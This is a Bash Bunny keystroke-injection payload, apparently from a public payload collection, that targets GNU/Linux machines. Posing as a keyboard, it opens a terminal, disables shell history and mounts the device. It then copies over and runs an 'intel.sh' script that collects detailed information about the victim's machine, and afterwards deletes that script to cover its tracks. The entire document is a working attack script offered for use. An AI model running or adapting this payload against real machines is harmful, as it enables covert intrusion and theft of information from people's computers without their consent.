# Title: intel # Description: intel(intelligence) payload collects detailed information of victims machine. # AUTHOR: drapl0n # Version: 1.0 # Category: Exfiltration # Target: GNU/Linux operating systems. # Attackmodes: HID, Storage. LED SETUP ATTACKMODE STORAGE HID GET SWITCH_POSITION LED ATTACK Q DELAY 1000 Q CTRL-ALT t Q DELAY 1000 # [Prevent storing history] Q STRING unset HISTFILE Q ENTER Q DELAY 200 # [Fetching BashBunny's block device] Q STRING lol='$(lsblk | grep 1.8G)' Q ENTER Q DELAY 100 Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' Q ENTER Q DELAY 200 # [Mounting BashBunny] Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp Q ENTER Q DELAY 2000 Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' Q ENTER Q DELAY 500 # [transfering payload script] Q STRING cp -r '$mntt'/payloads/intel.sh /tmp/ Q ENTER Q STRING chmod +x /tmp/intel.sh Q ENTER Q STRING /tmp/./intel.sh Q ENTER Q DELAY 25000 Q STRING rm /tmp/intel.sh Q ENTER Q DELAY 500 # [Unmounting BashBunny] Q STRING udisksctl unmount -b /dev/'$disk' Q ENTER Q DELAY 500 Q STRING exit Q ENTER LED FINISH